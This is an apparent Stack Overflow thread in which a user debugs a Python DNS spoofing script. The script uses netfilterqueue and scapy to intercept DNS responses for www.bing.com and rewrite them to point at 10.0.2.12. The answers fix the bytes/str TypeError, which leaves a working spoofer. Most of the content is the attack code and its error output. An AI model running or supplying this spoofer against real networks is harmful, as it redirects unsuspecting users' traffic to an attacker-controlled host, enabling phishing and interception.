# using Python 3 A byte-like object is required not a str" i have tried converting it into bytes but it still giving me the same error

Tags: python, python-3.x, python-3.7, scapy, netfilter

```py
import netfilterqueue
import scapy.all as scapy
 

    def process_packet(packet):
        scapy_packet = scapy.IP(packet.get_payload())
        if scapy_packet.haslayer(scapy.DNSRR):
            qname = scapy_packet[scapy.DNSQR].qname
            website = 'www.bing.com'
            
            if website in qname:
                print("[+] Spoofing ")
                answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.12")
                scapy_packet[scapy.DNS].an = answer
                scapy_packet[scapy.DNS].ancount = 1
    
                del scapy_packet[scapy.IP].len
                del scapy_packet[scapy.IP].chksum
                del scapy_packet[scapy.UDP].len
                del scapy_packet[scapy.UDP].chksum
    
                packet.set_payload(str(scapy_packet))
        packet.accept()
    
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(0, process_packet)
    queue.run()
```

---

```
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "dns_spoofer.py", line 9, in process_packet
    if website in qname:
TypeError: a bytes-like object is required, not 'str'
^CTraceback (most recent call last):
  File "dns_spoofer.py", line 25, in <module>
    queue.run()
KeyboardInterrupt
```

Comment: Please format your error in a code fence so that it's readable. Stack Overflow uses markdown, which is [documented here](https://stackoverflow.com/editing-help).

Answer (score 1):

Try `website = b'www.bing.com'`. The `b` makes it a byte literal.

Answer (score 0):

```
use website = b"www.bing.com"
```

and also in here

```
packet.set_payload(str(scapy_packet))
```

change this to

```
 packet.set_payload(bytes(scapy_packet))
```